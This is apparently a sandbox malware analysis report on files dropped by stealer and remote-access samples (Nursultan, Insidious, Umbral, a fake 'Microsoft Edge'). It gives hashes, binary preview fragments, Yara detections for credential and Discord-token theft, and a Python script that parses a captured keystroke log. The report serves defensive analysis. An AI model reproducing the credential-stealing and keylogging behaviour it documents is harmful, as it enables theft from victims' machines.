                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`....................................K.......P............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B........................H.......@...t.......6.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*...0..w.............%.o...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~...
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 7, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                      Category:dropped
                                      Size (bytes):229376
                                      Entropy (8bit):0.643383182059925
                                      Encrypted:false
                                      SSDEEP:384:A1zkVmvQhyn+Zoz67kMMTNlH333JqN8j/LKXu5Uu/:AlM0sCyW
                                      MD5:F23F48363C7BAA0709698208A7E833A0
                                      SHA1:07D2AEE271A0F2BA14608FE5A9A677E2594D22CC
                                      SHA-256:51DFB72705CBEB6AF5A14F2BE20FC39172E86263E25704F50BEB292F776B7713
                                      SHA-512:F8F16198A96F047E320EF82026160EBD5A0836B48FC3496C427F90965CF3BF5FAB5EBE0FB9016E3BDE56657EB42627D7286AED3167A422D69F865524892C3DFA
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................j......z..{...{.{j{*z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                      Category:dropped
                                      Size (bytes):294912
                                      Entropy (8bit):0.08438200565341271
                                      Encrypted:false
                                      SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v4U:51zkVmvQhyn+Zoz67NU
                                      MD5:F7EEE7B0D281E250D1D8E36486F5A2C3
                                      SHA1:309736A27E794672BD1BDFBAC69B2C6734FC25CE
                                      SHA-256:378DD46FE8A8AAC2C430AE8A7C5C1DC3C2A343534A64A263EC9A4F1CE801985E
                                      SHA-512:CE102A41CA4E2A27CCB27F415D2D69A75A0058BA0F600C23F63B89F30FFC982BA48336140714C522B46CC6D13EDACCE3DF0D6685D02844B8DB0AD3378DB9CABB
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:CSV text
                                      Category:dropped
                                      Size (bytes):422
                                      Entropy (8bit):5.364961821133733
                                      Encrypted:false
                                      SSDEEP:12:Q3La/KDLI4MWuPXcp1yoDLI4MWuPCU6yVFO5iv:ML9E4KQEAE4KKUNb
                                      MD5:A780B442F2C888A8E235B7EBC0A9A276
                                      SHA1:DF05FDFCC8054C84A5EFD5422A7EFCE33BA11CE7
                                      SHA-256:DF284B5D66C63DE45B1F365210C09EC1D4C3715282FC223967C222CDA870AA21
                                      SHA-512:A97AB3B3FFE5FAFF29A370E925C96EF6AC49D80DA3DD19A4FA15728B07C285D8612BC566D876FA1F6480C6EC357C3C50666A4B79192DE972F53E9C7F1930EAAF
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                      Process:C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
                                      File Type:CSV text
                                      Category:dropped
                                      Size (bytes):654
                                      Entropy (8bit):5.380476433908377
                                      Encrypted:false
                                      SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                      MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                      SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                      SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                      SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                      Process:C:\Users\user\Desktop\Nursultan.exe
                                      File Type:CSV text
                                      Category:dropped
                                      Size (bytes):654
                                      Entropy (8bit):5.380476433908377
                                      Encrypted:false
                                      SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                      MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                      SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                      SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                      SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                      Malicious:true
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                      Process:C:\Users\user\AppData\Local\Temp\Nursultan2.exe
                                      File Type:CSV text
                                      Category:dropped
                                      Size (bytes):654
                                      Entropy (8bit):5.380476433908377
                                      Encrypted:false
                                      SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                      MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                      SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                      SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                      SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                      Process:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):1965
                                      Entropy (8bit):5.377802142292312
                                      Encrypted:false
                                      SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHhAHKKkpLHDJHqHGHK+HKs:iq+wmj0qCYqGSI6owJtzHeqKkpLVKmqs
                                      MD5:582A844EB067319F705A5ADF155DBEB0
                                      SHA1:68B791E0F77249BF83CD4B23A6C4A773365E2CAD
                                      SHA-256:E489CF4E6C01EFE8827F172607D7E3CD89C4870B0B0CA5A33EFE64577E2CB8A9
                                      SHA-512:6F530A0E2D3910459AFEFD0295ACA93D3814AB98D9A6E2BE1C2B8B717F075C87EF908BBF955E38F7B976EC51ED512645D13D0FB60AC865867E573060C5D76B59
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):0.34726597513537405
                                      Encrypted:false
                                      SSDEEP:3:Nlll:Nll
                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                      Malicious:false
                                      Preview:@...e...........................................................
                                      Process:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                      Category:dropped
                                      Size (bytes):51200
                                      Entropy (8bit):0.8746135976761988
                                      Encrypted:false
                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                      Category:dropped
                                      Size (bytes):20480
                                      Entropy (8bit):0.8439810553697228
                                      Encrypted:false
                                      SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                      MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                      SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                      SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                      SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                      Category:dropped
                                      Size (bytes):20480
                                      Entropy (8bit):0.6732424250451717
                                      Encrypted:false
                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\Nursultan2.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):281088
                                      Entropy (8bit):5.851797552141892
                                      Encrypted:false
                                      SSDEEP:6144:qf+BLtABPDsJJfbdrJwiU0xoZnafTyElI1D0YeY:FJXqiU0xoLp1D+Y
                                      MD5:B70C03532081C928F946E844C5D2172D
                                      SHA1:7908B1D1E9AB5E222FAA6C816DD861382AA4A5C5
                                      SHA-256:3CF9D10FB9434A9C83D0FB65401E65B11FA643264FF17B5A9D75022E5D41AE29
                                      SHA-512:81E4DF48E246E3D842DDF8834BD96388F38E72EAD2AE5F46A473DC9BBFE56621E5912F51A7DEA1BA523B28144E11305EF29D48C61CA3525C80EFC0A76A265ECB
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_BlackGuard, Description: Yara detected BlackGuard, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: Joe Security
                                      • Rule: JoeSecurity_RagsStealer, Description: Yara detected Rags Stealer, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: Joe Security
                                      • Rule: JoeSecurity_44CaliberStealer, Description: Yara detected 44Caliber Stealer, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: ditekSHen
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: ditekSHen
                                      • Rule: MALWARE_Win_A310Logger, Description: Detects A310Logger, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: ditekSHen
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..........."...0..@.........."8... ...`....@.. ....................................`..................................7..O....`..............................47..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc...............H..............@..B.................8......H............(..........................................................2r...p(....&*....0..Z.......s".....rg..p~....o#....ry..p.o#....r...p~....o#...~....~.....(f.....o$...s%...o&....o'...*...0..V.......s".....rg..p.o#....ry..p.o#....r...p~....o#...~....~.....(f.....o$...s%...o&....o'...*...0..R.......s".....rg..p.o#....ry..p.o#....r...p~....o#....~.....(f.....o$...s%...o&....o'...*...0.............s(...%o)....}....%....io*...&o+...s".....r...p.o#....r...p.o#....r...p....s.
                                      Process:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                      Category:dropped
                                      Size (bytes):40960
                                      Entropy (8bit):0.8553638852307782
                                      Encrypted:false
                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):140
                                      Entropy (8bit):4.627408310856503
                                      Encrypted:false
                                      SSDEEP:3:rRSFYJKXzovNsrTyAF1M4W3tcAILCX/FsrTyAFkTAILCX/Fsra:EFYJKDoWrTyAFG4vjrTyAFkTjra
                                      MD5:390E21E04DFEB9E5694145D6A192F2ED
                                      SHA1:91B6B92C60407CDE123551D26F3E41AD44A7F798
                                      SHA-256:7F4CC8A25B0CB0F547560FE22A51F5E75D390C0C1B3A963110D6ABAACF6340B0
                                      SHA-512:CF77C0C60D8B251502835FBB14556A27B3D26384A587C1ED1F5F814EBA38B3A5DF23887DFA6C443FF7DD337D317475936D295CFD93ADF3149CD6445FA0140F47
                                      Malicious:false
                                      Preview:....### explorer ###..[WIN]r....### Administrator: C:\Windows\system32\cmd.exe ###..[WIN]r....### C:\Windows\system32\cmd.exe ###..[WIN]r
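The 140-byte text file above, dropped by Microsoft Edge.exe (the binary the Yara hits further down flag as XWorm), is a keystroke log: each "### title ###" line names the foreground window and the line after it holds the keys captured while it had focus. The reader below is an added example, not code from the report or from the malware; its input is reconstructed from the preview with each "." run read as CR/LF, and the treatment of bracketed names such as [WIN] as special keys is an assumption about the log format (a literally typed "[" would be misread).

```python
"""Reconstruct per-window keystrokes from a '### title ###' style keylog.

Added example, not part of the Joe Sandbox report.
"""
import re

# Constructed from the report's preview of the dropped 140-byte log.
KEYLOG = (
    "\r\n\r\n### explorer ###\r\n[WIN]r\r\n\r\n"
    "### Administrator: C:\\Windows\\system32\\cmd.exe ###\r\n[WIN]r\r\n\r\n"
    "### C:\\Windows\\system32\\cmd.exe ###\r\n[WIN]r"
)

WINDOW_RE = re.compile(r"^### (.*) ###$")
# Assumption: a bracketed upper-case name is a special key, anything else a
# literal character.
KEY_RE = re.compile(r"\[([A-Za-z0-9_]+)\]|(.)", re.DOTALL)


def tokenize(keys: str) -> list:
    """'[WIN]r' -> ['<WIN>', 'r']."""
    return [f"<{special}>" if special else char
            for special, char in KEY_RE.findall(keys)]


def parse_keylog(text: str) -> list:
    """Return [(window_title, tokens)] in capture order.

    Keys that appear before any window header (or on blank lines) are
    dropped rather than guessed at.
    """
    entries = []
    for line in text.splitlines():
        m = WINDOW_RE.match(line)
        if m:
            entries.append((m.group(1), []))
        elif line and entries:
            entries[-1][1].extend(tokenize(line))
    return entries


def chords(tokens: list) -> list:
    """Collapse a special key followed by one literal into 'WIN+r' form."""
    out, i = [], 0
    while i < len(tokens):
        t = tokens[i]
        if t.startswith("<") and i + 1 < len(tokens) and not tokens[i + 1].startswith("<"):
            out.append(f"{t[1:-1]}+{tokens[i + 1]}")
            i += 2
        else:
            out.append(t)
            i += 1
    return out


if __name__ == "__main__":
    for title, toks in parse_keylog(KEYLOG):
        print(f"{title!r}: {' '.join(chords(toks))}")
```

On this log every window records the same chord, Win+r, which is the sandbox's simulated activity rather than anything typed by a victim; the value of the parser is in grouping credentials or commands under the window they were typed into when the same format turns up on a compromised host.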
                                      Process:C:\Users\user\Desktop\Nursultan.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):212480
                                      Entropy (8bit):6.336877018807866
                                      Encrypted:false
                                      SSDEEP:3072:BXOsMDK0jn/VFJIYjbdU2BLOw5KRUGKXs+S++7KFSbxeY+qDDrMP:BoKc/Jjb6MJLGqStKEbxI
                                      MD5:C2A5CD7C5F8A633BAFB54B62CEE38077
                                      SHA1:033474BEFFB4C91158BD208EB80B39C0A26F6B2D
                                      SHA-256:DFCF3ED114355B554D2A3814946029C2688C4F617959B69375ED730250B9E9B1
                                      SHA-512:556A2CE11D01DE6C940306DA1A1D27BFE95EC52071A0762FD5F27FC5D9D4BE7BD50F9BC7DF922F483F8068783DD29CF81C9A492656DA21285C91404F1D603DDC
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, Author: ditekSHen
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 84%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................<..........^Z... ...`....@.. ....................................@..................................Z..O....`..J....................`....................................................... ............... ..H............text...d:... ...<.................. ..`.rsrc...J....`.......>..............@..@.reloc.......`.......<..............@..B................@Z......H........b..,.......&.....................................................(....*.r...p*. 6V=.*..(....*.rA..p*. ..e.*.s.........s.........s.........s.........*.r...p*. ....*.rA..p*.r...p*. ).,.*.rA..p*. {...*.r...p*. S...*..((...*.r7..p*. ....*.r...p*. ~.H.*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.rG..p*. .0..*.r...p*. ....*.rG..p*. ..r.*.r...p*. ....*.r...p*. .B..*.rm..p*. W...*.r...p*. .x
                                      Process:C:\Users\user\Desktop\Nursultan.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):805888
                                      Entropy (8bit):7.993117417046743
                                      Encrypted:true
                                      SSDEEP:12288:0kj3VyVlq8nK2iRBZM2gBw8o6RFlsn0cM9h6ZismwOixcebpoWldvd:0kj3P22M2gBwnwGE9+i/febDd
                                      MD5:A99954BFF017983BF455DE31C5F0696A
                                      SHA1:6302C232C1DD4DA3B0A013B95F94F7619B354D0A
                                      SHA-256:4C9980B653343C08D0162D2D8A6F6488BD2CA34A5FCD14762670B872315D39C6
                                      SHA-512:9646425AF49B96389D08EAC718A1FCAC51B97035A83E208BE7A667C2036258E134BD0E56187699361B4CB8728E2F6E81532AD33316E95AEE8511E3D0DA0D1F05
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 92%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................0...........N... ...`....@.. ....................................@..................................M..W....`..4............................................................................ ............... ..H............text...4.... ...0.................. ..`.rsrc...4....`.......2..............@..@.reloc...............J..............@..B.................N......H.......@7..............V'................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                      Process:C:\Users\user\AppData\Local\Temp\Nursultan.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):606720
                                      Entropy (8bit):7.987793990088752
                                      Encrypted:false
                                      SSDEEP:12288:VXZAg1hx1+pRVDsNScqjhbjtik2wQOV8e1psZk1F5:VpAg1hP+5Ayjtti3Te1qq
                                      MD5:0BA8218F991E81620F31083273EE7D91
                                      SHA1:980539589B8BBA6E619C836436D8C5BA8AEBD18A
                                      SHA-256:738C2F09D5AB56751BD47C492A743208291DC7CE128B7F0EACFCC9EEDF97C786
                                      SHA-512:1277A5B997393B77DE8A4351A14A6B506DEB6268CBABACCBBED7027DA4EEEBE9C0521D4FA21D1FA17F7734E59FEECAD15026CAF4FFE5FBD44690B00F8E8BC7EE
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*.f.................&...........E... ...`....@.. ....................................@..................................D..K....`..4............................................................................ ............... ..H............text...4%... ...&.................. ..`.rsrc...4....`.......(..............@..@.reloc...............@..............@..B.................E......H.......x-..h...........f'................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                      Process:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                      Category:dropped
                                      Size (bytes):454652
                                      Entropy (8bit):7.997941427187956
                                      Encrypted:true
                                      SSDEEP:6144:tXYRR5JBVauWIeSWx1Cl/I45RJIyx4qvIEG/0HqN1g1mXJzAwnKOPsgF9g3yX6:yqwgCsyx4qvl1V01s5f
                                      MD5:3E902073F6A62720D2274A868F175548
                                      SHA1:4EA4CAD374474A69407F5C65652BAA26BE039157
                                      SHA-256:7A6F694579C52FE36E6312B3998CA5FDC4F53C6F546736EBCADFD7991076497F
                                      SHA-512:BDD8FC9BA0FA19D3A56ACC9F2B44FFA670147569541DE39F9845969B18914CC790BAEFDE641221712F36B408E56AB6FEB5BFDD57B3C90E2A9A9D93EE1B01F7CF
                                      Malicious:false
